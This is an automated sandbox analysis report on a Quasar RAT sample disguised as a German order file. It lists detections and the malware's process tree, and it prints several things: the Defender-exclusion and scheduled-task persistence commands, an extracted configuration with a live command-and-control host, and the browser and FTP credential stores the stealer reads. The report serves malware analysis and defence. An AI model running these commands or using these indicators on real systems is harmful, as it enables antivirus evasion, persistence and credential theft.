Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bestellung - 021224 - 901003637.exe

Overview

General Information

Sample name:Bestellung - 021224 - 901003637.exe
Analysis ID:1567415
MD5:15f259b30ec72a5217144834f7f5b564
SHA1:baed3fe7d059a497f856e263431ccd3872ef1ea1
SHA256:01de053d9560d419f0b6c35dbddb1175eb1fd7a21450989332024b812d39c4c2
Tags:DEUexegeouser-abuse_ch
Infos:

Detection

Quasar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Quasar RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Bestellung - 021224 - 901003637.exe (PID: 6052 cmdline: "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe" MD5: 15F259B30EC72A5217144834F7F5B564)
    • powershell.exe (PID: 5364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7128 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Bestellung - 021224 - 901003637.exe (PID: 2288 cmdline: "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe" MD5: 15F259B30EC72A5217144834F7F5B564)
      • schtasks.exe (PID: 4032 cmdline: "schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • outlooks.exe (PID: 3648 cmdline: "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" MD5: 15F259B30EC72A5217144834F7F5B564)
        • powershell.exe (PID: 3116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1568 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 1296 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpD780.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • outlooks.exe (PID: 6088 cmdline: "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" MD5: 15F259B30EC72A5217144834F7F5B564)
          • schtasks.exe (PID: 2056 cmdline: "schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • eNuXmIwkixzW.exe (PID: 3020 cmdline: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe MD5: 15F259B30EC72A5217144834F7F5B564)
    • schtasks.exe (PID: 3392 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp314.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • eNuXmIwkixzW.exe (PID: 4820 cmdline: "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe" MD5: 15F259B30EC72A5217144834F7F5B564)
  • outlooks.exe (PID: 4936 cmdline: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe MD5: 15F259B30EC72A5217144834F7F5B564)
    • powershell.exe (PID: 792 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 3456 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp537.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • outlooks.exe (PID: 6064 cmdline: "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" MD5: 15F259B30EC72A5217144834F7F5B564)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware Configuration

Threatname: Quasar

{"Version": "1.4.1", "Host:Port": "hoffmann3.ydns.eu:5829;", "SubDirectory": "WindowsUpdates", "InstallName": "outlooks.exe", "MutexName": "532aca2b-96ff-44aa-9213-031e975919ac", "StartupKey": "Outlooks", "Tag": "DAVID", "LogDirectoryName": "Logs", "ServerSignature": "cMAo43KgwCRkLXKVNIKcbYF07RAwbtRiV0xjmkvAofyHyMq4KQaMcDP+RYvo1XiqFvef4x+X0rbd142vWz4pHg5viwUqxUX1M6robk46oLiAINhWpLys7jGBDZM901rJZjqqDBIINPcsgv4AWIy0U/a7tZxg6OolVtO+sjchc/DrQikiod3q1OY2KJoHDKtwiRU3hwmo3XAK1rnJCm9//ZKLqEpP/DdCH5oGKU3eUq2ag0KGgcHjyAZuOSMbuDGNqGib2CVkxbyWxYq3QO2kfmB7BUHIxUZFdcv96UXAstsNW/O2INHr1fZcEWb60EDooIPifUNDgK6y5owwE57m7fVryCJMvBkg8rjUjOQHIs47qpUd3llalYmrd7NBKuHpT7j6yGGxUqvIdb8jBDV1hE4ZN5Uj9Niv/8holMJceh3+Tlw/ZolpP63q1J6vD2/Y3trWWfM4EE+p77psVZVDhW/Lmz8My1WsvjUlXbYVOYopNIE9T278LpJYHT2hbdd508tIF3+OsysQr88ALAVUfSK9M34qgF9C8y3e6sziotc7goPVuhSFNiqnwNZna0lcFMRiQJHXYLbEdblvCS8sw7gxi71tBqSWnN4n2BB+XxnjG3aKD3c24kr8f2S6x2bL9LU48qkJ1oSE238B1Uo7cG5tMJjXh2hQrFsMnuArxuQ=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAI7O15gZ6Bvo1v7Z6Z+o8zANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MTAyNzIyNDYwNloYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAqbPveNu2fk+RQb1R3gm4Prdzthf81O6C4rvp3RcGpa8WzDlFIkUJlXlZq7CutP//HEzLJNmi8Uh5bhjgkulxUchu6qMN9+9Jp+6XLvYKP1aFl7wqJg7DKAHl7YxaaRGO1SA+eCffgbFQflu2IDKGQdq6euhYB3Hf5fyPi/J8qQyT3vkT7EOU4yTSLSOB5Chey+0Vnd9UHDVDaFvNspUfomDPE20kDevZjfeIIRpuNPwQQwaRl56UImZwfQus48RiJj8ec1t6djIpmwW+AzlB1bPCQrC8O/MO2FwHpQ1dcEGQv0kF04UP3CElKcm2YETUylyrkpRAOZPKCsItn3IfL0d61z3wZGB5y6w0bGHFlB4Wka0CAO1Ut4GR5yOeTyoK7tU/qeqrUH5UI/vtaNOCVy40h7OLblm6BKMezr+jLiXtr8g3IZ0tvSdDdM8mpLxYhUF9sWN4czZjw2/TWYQV7NmP8zWbcNtvzN+1M/TSxr2T+TIQCP9/53dElp8soycnY93mu4yGp4EkIP7/yHIhZJUAYYGhbGargWK+84YWH+CdW5494T04AeYBctFxIWG1uW/dHCcIdA4cN75ix8R58h7typtKInugH3CpGYBOzyJXW9NqBkrpxnT8sW9Js90VQRADLwoXBWu03CZ5aVb9be6P42FdFl+noKLQ/R5XkmkCAwEAAaMyMDAwHQYDVR0OBBYEFL+5mluRt/P41ETYJZpAZazC28C/MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAEJE3+krpRiCkX9UWAzNqNBa9oqQOSoqju90CrhZs1+BKZQpkh2fFHn6NVH9joVzu+lXegf/O1Ub/I0ZxHn1zbGzJXw2PqrZ2X8ewj+23EbWweedx76Uh+AZAby9TvZIAO2/HFFGqGy5T4WJ2swTZgwrZ9mFRqDgQWF1QWFrnOluaOa7T+jvMW0rxAX+kgEVDl/9e3PRa5xFrQCg/vy0pnzvnmTD5W/B0yViwtruDt5xyoxRlCnhTK9IIBNgGhY74mc+xa4lObXfcbz6zz4xgz0KvSrKZfu69cP2Y5LSH8TUD5bzsSgl15M9mVSHsqADSL40SjK3eoxcj33cMgMS5dvNB6o25l8QGJtuhz+IGqtCQaU13ev1YxTwOZKYjwwpSIycpV+LDmoR2dWgyDhjbhkuJ92reL16ND9DcZRTwrx6Idyy3oKrUyWlS6kHIXujTQHvvU+qLgfgQJYOryT0iRcn6DWkhLzRq0yzhrgD3ZPPreZ3xJ/RSnyvRjOEivReVBDlm0eWbg0J2bpOa1cDdlfsRg9nuZWkXeghkFtzvgOB0rkgRYD+m0S5N/qlhPXETBO5sGqHsSHTPjyAnVyP61Zr4cn/H0otTzReF6/FjIKsqH+v6Q27D0j6fJRbvTtShZdOzT6RtyoCh1HIeByJX5Ae18uHkU+wvUXXaIijYOR5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.1683887266.00000000026A6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
    00000009.00000002.1477097522.0000000000720000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
      0000000D.00000002.1555939194.00000000033C3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
        00000000.00000002.1448519828.00000000029F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
          0000000F.00000002.1685100686.00000000033FE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
            Click to see the 14 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
              9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpackMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
                • 0x28ef4d:$x1: Quasar.Common.Messages
                • 0x29f276:$x1: Quasar.Common.Messages
                • 0x2ab832:$x4: Uninstalling... good bye :-(
                • 0x2ad027:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
                9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
                • 0x2aade4:$f1: FileZilla\recentservers.xml
                • 0x2aae24:$f2: FileZilla\sitemanager.xml
                • 0x2aae66:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
                • 0x2ab0b2:$b1: Chrome\User Data\
                • 0x2ab108:$b1: Chrome\User Data\
                • 0x2ab3e0:$b2: Mozilla\Firefox\Profiles
                • 0x2ab4dc:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                • 0x2fd438:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                • 0x2ab634:$b4: Opera Software\Opera Stable\Login Data
                • 0x2ab6ee:$b5: YandexBrowser\User Data\
                • 0x2ab75c:$b5: YandexBrowser\User Data\
                • 0x2ab430:$s4: logins.json
                • 0x2ab166:$a1: username_value
                • 0x2ab184:$a2: password_value
                • 0x2ab470:$a3: encryptedUsername
                • 0x2fd37c:$a3: encryptedUsername
                • 0x2ab494:$a4: encryptedPassword
                • 0x2fd39a:$a4: encryptedPassword
                • 0x2fd318:$a5: httpRealm
                9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpackMALWARE_Win_QuasarStealerDetects Quasar infostealerditekshen
                • 0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null
                • 0x2ab91c:$s3: Process already elevated.
                • 0x28ec4c:$s4: get_PotentiallyVulnerablePasswords
                • 0x278d08:$s5: GetKeyloggerLogsDirectory
                • 0x29e9d5:$s5: GetKeyloggerLogsDirectory
                • 0x28ec6f:$s6: set_PotentiallyVulnerablePasswords
                • 0x2fea66:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
                Click to see the 18 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", ParentImage: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe, ParentProcessId: 6052, ParentProcessName: Bestellung - 021224 - 901003637.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", ProcessId: 5364, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", ParentImage: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe, ParentProcessId: 6052, ParentProcessName: Bestellung - 021224 - 901003637.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", ProcessId: 5364, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpD780.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpD780.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe", ParentImage: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe, ParentProcessId: 3648, ParentProcessName: outlooks.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpD780.tmp", ProcessId: 1296, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", ParentImage: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe, ParentProcessId: 6052, ParentProcessName: Bestellung - 021224 - 901003637.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp", ProcessId: 7128, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", ParentImage: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe, ParentProcessId: 6052, ParentProcessName: Bestellung - 021224 - 901003637.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", ProcessId: 5364, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", ParentImage: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe, ParentProcessId: 6052, ParentProcessName: Bestellung - 021224 - 901003637.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp", ProcessId: 7128, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:53:52.621028+010020355951Domain Observed Used for C2 Detected193.34.212.175829192.168.2.849713TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:53:52.621028+010020276191Domain Observed Used for C2 Detected193.34.212.175829192.168.2.849713TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: Bestellung - 021224 - 901003637.exeAvira: detected
                Antivirus detection for URL or domain
                Source: hoffmann3.ydns.euAvira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeAvira: detection malicious, Label: HEUR/AGEN.1357257
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeAvira: detection malicious, Label: HEUR/AGEN.1357257
                Found malware configuration
                Source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpackMalware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "hoffmann3.ydns.eu:5829;", "SubDirectory": "WindowsUpdates", "InstallName": "outlooks.exe", "MutexName": "532aca2b-96ff-44aa-9213-031e975919ac", "StartupKey": "Outlooks", "Tag": "DAVID", "LogDirectoryName": "Logs", "ServerSignature": "cMAo43KgwCRkLXKVNIKcbYF07RAwbtRiV0xjmkvAofyHyMq4KQaMcDP+RYvo1XiqFvef4x+X0rbd142vWz4pHg5viwUqxUX1M6robk46oLiAINhWpLys7jGBDZM901rJZjqqDBIINPcsgv4AWIy0U/a7tZxg6OolVtO+sjchc/DrQikiod3q1OY2KJoHDKtwiRU3hwmo3XAK1rnJCm9//ZKLqEpP/DdCH5oGKU3eUq2ag0KGgcHjyAZuOSMbuDGNqGib2CVkxbyWxYq3QO2kfmB7BUHIxUZFdcv96UXAstsNW/O2INHr1fZcEWb60EDooIPifUNDgK6y5owwE57m7fVryCJMvBkg8rjUjOQHIs47qpUd3llalYmrd7NBKuHpT7j6yGGxUqvIdb8jBDV1hE4ZN5Uj9Niv/8holMJceh3+Tlw/ZolpP63q1J6vD2/Y3trWWfM4EE+p77psVZVDhW/Lmz8My1WsvjUlXbYVOYopNIE9T278LpJYHT2hbdd508tIF3+OsysQr88ALAVUfSK9M34qgF9C8y3e6sziotc7goPVuhSFNiqnwNZna0lcFMRiQJHXYLbEdblvCS8sw7gxi71tBqSWnN4n2BB+XxnjG3aKD3c24kr8f2S6x2bL9LU48qkJ1oSE238B1Uo7cG5tMJjXh2hQrFsMnuArxuQ=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAI7O15gZ6Bvo1v7Z6Z+o8zANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MTAyNzIyNDYwNloYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAqbPveNu2fk+RQb1R3gm4Prdzthf81O6C4rvp3RcGpa8WzDlFIkUJlXlZq7CutP//HEzLJNmi8Uh5bhjgkulxUchu6qMN9+9Jp+6XLvYKP1aFl7wqJg7DKAHl7YxaaRGO1SA+eCffgbFQflu2IDKGQdq6euhYB3Hf5fyPi/J8qQyT3vkT7EOU4yTSLSOB5Chey+0Vnd9UHDVDaFvNspUfomDPE20kDevZjfeIIRpuNPwQQwaRl56UImZwfQus48RiJj8ec1t6djIpmwW+AzlB1bPCQrC8O/MO2FwHpQ1dcEGQv0kF04UP3CElKcm2YETUylyrkpRAOZPKCsItn3IfL0d61z3wZGB5y6w0bGHFlB4Wka0CAO1Ut4GR5yOeTyoK7tU/qeqrUH5UI/vtaNOCVy40h7OLblm6BKMezr+jLiXtr8g3IZ0tvSdDdM8mpLxYhUF9sWN4czZjw2/TWYQV7NmP8zWbcNtvzN+1M/TSxr2T+TIQCP9/53dElp8soycnY93mu4yGp4EkIP7/yHIhZJUAYYGhbGargWK+84YWH+CdW5494T04AeYBctFxIWG1uW/dHCcIdA4cN75ix8R58h7typtKInugH3CpGYBOzyJXW9NqBkrpxnT8sW9Js90VQRADLwoXBWu03CZ5aVb9be6P42FdFl+noKLQ/R5XkmkCAwEAAaMyMDAwHQYDVR0OBBYEFL+5mluRt/P41ETYJZpAZazC28C/MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAEJE3+krpRiCkX9UWAzNqNBa9oqQOSoqju90CrhZs1+BKZQpkh2fFHn6NVH9joVzu+lXegf/O1Ub/I0ZxHn1zbGzJXw2PqrZ2X8ewj+23EbWweedx76Uh+AZAby9TvZIAO2/HFFGqGy5T4WJ2swTZgwrZ9mFRqDgQWF1QWFrnOluaOa7T+jvMW0rxAX+kgEVDl/9e3PRa5xFrQCg/vy0pnzvnmTD5W/B0yViwtruDt5xyoxRlCnhTK9IIBNgGhY74mc+xa4lObXfcbz6zz4xgz0KvSrKZfu69cP2Y5LSH8TUD5bzsSgl1